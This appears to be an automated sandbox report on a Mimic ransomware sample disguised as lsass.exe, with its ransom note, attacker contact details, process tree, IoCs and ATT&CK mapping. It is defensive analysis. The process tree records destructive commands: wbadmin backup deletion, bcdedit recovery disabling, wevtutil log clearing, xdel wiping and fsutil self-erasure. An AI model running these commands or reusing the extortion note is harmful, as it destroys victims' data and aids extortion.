Overview

overview

10

Static

static

3

lsass.exe

windows11-21h2-x64

10

Resubmissions

29-11-2024 15:57

241129-td12ysylek 10

Analysis

  • max time kernel
    397s
  • max time network
    392s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-de
  • resource tags

    arch:x64arch:x86image:win11-20241007-delocale:de-deos:windows11-21h2-x64systemwindows
  • submitted
    29-11-2024 15:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lsass.exe

  • Size

    2.3MB

  • MD5

    131f1e70e37f54ca486f111b596ea4ce

  • SHA1

    b460653cb8a5294711d70a6a240100fbbb475b30

  • SHA256

    c09333024c035b820003b8af59cbba362bfcdc5e2308fc8027dca324e0666c2c

  • SHA512

    128b4e0946e1cc0227bb21a385a8df9ced6e12235fac99a506ec7e18c63806dc6e429eab6f21b971217433d68b8efc19f8c0006a5d53126fe21673ad9254caf5

  • SSDEEP

    49152:wgwRAifu1DBgutBPNN52/N+0MgrMPR9JZqoUGKv1dHNUv+/C:wgwRAvguPPFeNvuRZqfD1l8L

Score
10/10
mimicdiscoveryevasionexecutionpersistenceransomwaretrojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\How-to-decrypt.txt

Ransom Note
|!!!| Hello |!!!| ---> DON'T ignore this and check ALL INFO carefully!!! *** About situation: ALL your important files have been encrypted and ALL sensitive information also leaked! This modification is reversible and data remain safe! Encrypting your data is only proof , we only interested money, we don't want to damage your reputation , don't want to harm your work, not make a DDOS attack on your infrastructure - we only check and uploaded your files! *** IF WE DO NOT FIND A COMMON LANGUAGE: ---> All encrypted data be irretrievably lost. ---> Leaked data will be published or sold on black-market (or to competitors). This will be followed by serious consequences and all your customers\partners and special services will be notified about it! !!! FOLLOW INSTRUCTIONS TO AVOID IRREVERSIBLE CONSEQUENCES !!! !!!YOU NEED ASAP CONTACT WITH US TO DEAL THIS!!! Our contacts will be provided below! **************************************** !!! WARNING !!! DON'T use any third party software for restoring your data or antivirus solutions! DO NOT MODIFY ENCRYPTED FILES! DO NOT RENAME ENCRYPTED FILES! - it's may entail damage of the private key and, as result - you loss all data. !!!No software and services available on internet can help you!!! !!! Decryption of your files with the help of third parties may cause increased price (they add their fee to our and they usually fail) or you can become a victim of a scam. **************************************** REMINDING: It's in your interests to get your files back and safe all lost files,docs,bases. We have your highly confidential/personal data. These data are currently stored on a private server(cloud)! ---> After payment this cloud will be deleted and your data stay safe! We guarantee complete anonymity and can provide you with proof and guaranties from our side and our best specialists make everything for restoring, but please should not interfere without us. |!!!| IF YOU DON'T CONTACT US WITHIN 48 HOURS FROM MOMENT OF LOCK YOUR SERVERS - WE START LOOKING CLIENTS FOR SELL YOUR DATA IN OUR PRIVATE CHANNELS AND PRICE WILL BE HIGHER. |!!!| ---------------------------------------- Your unique ID is: zcrtZ5mEyw9AsBqgfcOeawBsog36voiyp2_Vj7syEFE*LOQUI Send this ID when you will contact us!. ---------------------------------------- *** HOW TO CONTACT US: Just write us an email to this mail(s): [email protected] [email protected] * To ANONIMOUS contact with us, create a new free email account on the site: onionmail.org (recommended)( REGISTER IN TOR BROWSER: http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/ ) , tutanota.com * To avoid having your email blocked and get spam filters, send private information (such as your private key) with the private notes service: privnote.com, 1ty.me, www.private-notes.com If you do not receive a reply within 24 hours or do not receive a response to your following messages, contact us with another email or through qTox! ! add our mails to contacts so as not to lose letters from us ! !!! check your spam sometimes, our emails may get there !!! !!! for a quick contact with us or if you will not receive our letters !!! download qTox and ADD our TOXID. our individual key(TOXID): 3A381C022C1F235748B069D7B242A53CE6C74BBB4ED16C8FFAA1183B92C2E469DDD27F45A6EF How to download qTOX messenger: https://tox.chat/download.html https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe
URLs

http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/

https://tox.chat/download.html

https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe

Signatures

  • Detects Mimic ransomware 1 IoCs
  • Mimic

    Ransomware family was first exploited in the wild in 2022.

    ransomwaremimic
  • Mimic family
    mimic
  • UAC bypass 3 TTPs 4 IoCs
    evasiontrojan
  • Clears Windows event logs 1 TTPs 3 IoCs
    evasionransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (187) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
    persistence
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies system executable filetype association 2 TTPs 10 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Power Settings 1 TTPs 15 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 16 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 20 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\lsass.exe
    "C:\Users\Admin\AppData\Local\Temp\lsass.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" i
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:5052
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" x -y -p2441418567841718753 Everything64.dll
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:276
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_chesniybro_chesniybro_2022-12-06_15-32-01=LOQUI.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_chesniybro_chesniybro_2022-12-06_15-32-01=LOQUI.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies system executable filetype association
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4672
      • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
        "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe"
        3⤵
        • UAC bypass
        • Event Triggered Execution: Image File Execution Options Injection
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system executable filetype association
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:1604
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c DC.exe /D
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3636
          • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\DC.exe
            DC.exe /D
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4552
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" -e watch -pid 1604 -!
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4956
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" -e ul1
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3820
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" -e ul2
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4196
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe" -startup
          4⤵
          • Executes dropped EXE
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2996
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -H off
          4⤵
          • Power Settings
          PID:5096
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:2472
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:2596
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:3984
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:132
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:3144
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:3120
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:556
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:3028
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:4124
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:1000
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:1600
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:2528
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
          4⤵
          • Power Settings
          PID:748
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb61
          4⤵
          • Power Settings
          PID:4872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3164
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:4876
        • C:\Windows\SYSTEM32\bcdedit.exe
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4008
        • C:\Windows\SYSTEM32\bcdedit.exe
          bcdedit.exe /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3300
        • C:\Windows\SYSTEM32\wbadmin.exe
          wbadmin.exe DELETE SYSTEMSTATEBACKUP
          4⤵
          • Deletes System State backups
          PID:3872
        • C:\Windows\SYSTEM32\wbadmin.exe
          wbadmin.exe delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:2524
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe" -startup
          4⤵
          • Executes dropped EXE
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:1748
        • C:\Windows\SysWOW64\notepad.exe
          notepad.exe "C:\Users\Admin\AppData\Local\How-to-decrypt.txt"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2572
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe" -accepteula -p 1 -c C:\
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4064
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe" -accepteula -p 1 -c F:\
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2428
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl security
          4⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          PID:4820
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl system
          4⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          PID:4372
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl application
          4⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          PID:3220
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /d /c "ping 127.2 -n 5 & fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" & cd /d "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}" & Del /f /q /a *.exe *.ini *.dll *.bat *.db"
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:3680
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.2 -n 5
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2908
          • C:\Windows\SysWOW64\fsutil.exe
            fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4056
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2236
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1696
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\How-to-decrypt.txt
      1⤵
        PID:3524
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:4156
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\temp\MIMIC_LOG.txt
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:3204
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
          PID:4952
        • C:\Windows\system32\wbengine.exe
          "C:\Windows\system32\wbengine.exe"
          1⤵
            PID:4524
          • C:\Windows\System32\vdsldr.exe
            C:\Windows\System32\vdsldr.exe -Embedding
            1⤵
              PID:3796
            • C:\Windows\System32\vds.exe
              C:\Windows\System32\vds.exe
              1⤵
              • Checks SCSI registry key(s)
              PID:3712
            • C:\Windows\system32\dwm.exe
              "dwm.exe"
              1⤵
              • Modifies data under HKEY_USERS
              PID:3496
            • C:\Windows\system32\dwm.exe
              "dwm.exe"
              1⤵
              • Checks SCSI registry key(s)
              • Modifies data under HKEY_USERS
              PID:1448
            • C:\Windows\system32\dwm.exe
              "dwm.exe"
              1⤵
              • Checks SCSI registry key(s)
              • Modifies data under HKEY_USERS
              PID:392
            • C:\Windows\system32\dwm.exe
              "dwm.exe"
              1⤵
              • Modifies data under HKEY_USERS
              PID:1848
            • C:\Windows\system32\dwm.exe
              "dwm.exe"
              1⤵
              • Modifies data under HKEY_USERS
              PID:1060
            • C:\Windows\system32\dwm.exe
              "dwm.exe"
              1⤵
                PID:4548
              • C:\Windows\system32\dwm.exe
                "dwm.exe"
                1⤵
                • Modifies data under HKEY_USERS
                PID:2500
              • C:\Windows\system32\dwm.exe
                "dwm.exe"
                1⤵
                • Checks SCSI registry key(s)
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                PID:3324
              • C:\Windows\system32\AUDIODG.EXE
                C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004C8
                1⤵
                  PID:1412
                • C:\Windows\system32\LogonUI.exe
                  "LogonUI.exe" /flags:0x0 /state0:0xa39f9855 /state1:0x41c64e6d
                  1⤵
                  • Modifies data under HKEY_USERS
                  • Suspicious use of SetWindowsHookEx
                  PID:3096
                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                  1⤵
                    PID:1532

                  Network

                  MITRE ATT&CK Enterprise v15

                  Reconnaissance

                  Resource Development

                  Initial Access

                  Execution

                  Command and Scripting Interpreter

                  3
                  T1059

                  PowerShell

                  1
                  T1059.001

                  Persistence

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Event Triggered Execution

                  2
                  T1546

                  Change Default File Association

                  1
                  T1546.001

                  Image File Execution Options Injection

                  1
                  T1546.012

                  Power Settings

                  1
                  T1653

                  Privilege Escalation

                  Abuse Elevation Control Mechanism

                  1
                  T1548

                  Bypass User Account Control

                  1
                  T1548.002

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Event Triggered Execution

                  2
                  T1546

                  Change Default File Association

                  1
                  T1546.001

                  Image File Execution Options Injection

                  1
                  T1546.012

                  Defense Evasion

                  Abuse Elevation Control Mechanism

                  1
                  T1548

                  Bypass User Account Control

                  1
                  T1548.002

                  Impair Defenses

                  1
                  T1562

                  Disable or Modify Tools

                  1
                  T1562.001

                  Indicator Removal

                  3
                  T1070

                  Clear Windows Event Logs

                  1
                  T1070.001

                  File Deletion

                  2
                  T1070.004

                  Modify Registry

                  4
                  T1112

                  Credential Access

                  Discovery

                  Peripheral Device Discovery

                  2
                  T1120

                  Query Registry

                  4
                  T1012

                  Remote System Discovery

                  1
                  T1018

                  System Information Discovery

                  5
                  T1082

                  System Location Discovery

                  1
                  T1614

                  System Language Discovery

                  1
                  T1614.001

                  System Network Configuration Discovery

                  1
                  T1016

                  Internet Connection Discovery

                  1
                  T1016.001

                  Lateral Movement

                  Collection

                  Command and Control

                  Exfiltration

                  Impact

                  Inhibit System Recovery

                  3
                  T1490

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\How-to-decrypt.txt
                    Filesize

                    3KB

                    MD5

                    e94b0909d3239d5164619d298bc2948e

                    SHA1

                    afe26b8dea7b6ca946f4892a6cb9a4ee0f95a19a

                    SHA256

                    97a5107512568f04cfe07576f1ea780c848da5b669569c94ed1c84e3b228c1bc

                    SHA512

                    89ef84843ac99706bb1a129a9f3ea25b9d68eb5cf7835b2b547489fc2ef5caaf47eb114922e1adbbf48539c062cac456af917979d15c76df4c668d6ec6a7696d

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    Filesize

                    2KB

                    MD5

                    627073ee3ca9676911bee35548eff2b8

                    SHA1

                    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                    SHA256

                    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                    SHA512

                    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    944B

                    MD5

                    2e8eb51096d6f6781456fef7df731d97

                    SHA1

                    ec2aaf851a618fb43c3d040a13a71997c25bda43

                    SHA256

                    96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

                    SHA512

                    0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    1KB

                    MD5

                    fa72f16d921429c3d4529f54e726df59

                    SHA1

                    c8e732127f403498271f61d53bf9ffa9906afdc4

                    SHA256

                    40196caa243bfb54e1d4cf6fadaca9249601cdf48d10c77407ba1fbde47e5567

                    SHA512

                    805a0b816105ad055c86ef549a5426fcddd221766d6aabd7446c1b58292ad9b8c3aa5cc34815b16e935f4b9ce69c2b513ec6fd774e8fcf580b8cffabd0c08400

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
                    Filesize

                    182B

                    MD5

                    f3e14552ccc738c259183b1718a540c5

                    SHA1

                    faaf5ef0267f0a1af2c889c6c5f4e488190802d1

                    SHA256

                    da8c582047aa2356325368f4c97a598c9d9b02db2da6ba836ba412ac5720a9c5

                    SHA512

                    0d280669333de999804edec032da5c26400dcc71c855856cfeb84de50904c0450ab00227ef5bb98bfa316a740530062ce6a90559b7f4efc290e55a65d8118e7a

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
                    Filesize

                    772KB

                    MD5

                    b93eb0a48c91a53bda6a1a074a4b431e

                    SHA1

                    ac693a14c697b1a8ee80318e260e817b8ee2aa86

                    SHA256

                    ab15a9b27ee2d69a8bc8c8d1f5f40f28cd568f5cbb28d36ed938110203f8d142

                    SHA512

                    732cb0dcb2b1dac1a7462554c256cec27de243734f79b7f87026e9f5fbae6d5d8a5f14a702d2af0b65897b6abad70a9eff1905dc851ce267d221ddcdd9e640c5

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\DC.exe
                    Filesize

                    802KB

                    MD5

                    ac34ba84a5054cd701efad5dd14645c9

                    SHA1

                    dc74a9fd5560b7c7a0fc9d183de9d676e92b9e8b

                    SHA256

                    c576f7f55c4c0304b290b15e70a638b037df15c69577cd6263329c73416e490e

                    SHA512

                    df491306a3c8ddb580b7cca1dce9e22a87fd43ca3632f3630cdcbe114bef243e847b2ce774d688f6e142516f2e0fc49d30fad7c7168e627523da21e2fe06836a

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_chesniybro_chesniybro_2022-12-06_15-32-01=LOQUI.exe
                    Filesize

                    2.0MB

                    MD5

                    61333a904b47ecea8d13ea1403cf45ca

                    SHA1

                    e02d57f84b9543483cb7db1a6ad893da3ea2504b

                    SHA256

                    6e781b4a318399a5c6885ef7273d76eec42c6ac7f66c6b20bbc9dcc84d3475ac

                    SHA512

                    26bf870b28b294b7b9413995a6439774889951f860c46cf36bfa91d7390ae484e059382ca7f767f377dfc46b8d60c25691aa1d40d61c1a86ac9a9cce3c8bdea3

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything.exe
                    Filesize

                    1.7MB

                    MD5

                    c44487ce1827ce26ac4699432d15b42a

                    SHA1

                    8434080fad778057a50607364fee8b481f0feef8

                    SHA256

                    4c83e46a29106afbaf5279029d102b489d958781764289b61ab5b618a4307405

                    SHA512

                    a0ea698333c21e59b5bc79d79ff39d185a019cede394dbd8b2eb72c4230001685a90098a691c296aeab27db6751eef56c4261cf00f790de2e9e9efc0e7f7c808

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything.ini
                    Filesize

                    548B

                    MD5

                    742c2400f2de964d0cce4a8dabadd708

                    SHA1

                    c452d8d4c3a82af4bc57ca8a76e4407aaf90deca

                    SHA256

                    2fefb69e4b2310be5e09d329e8cf1bebd1f9e18884c8c2a38af8d7ea46bd5e01

                    SHA512

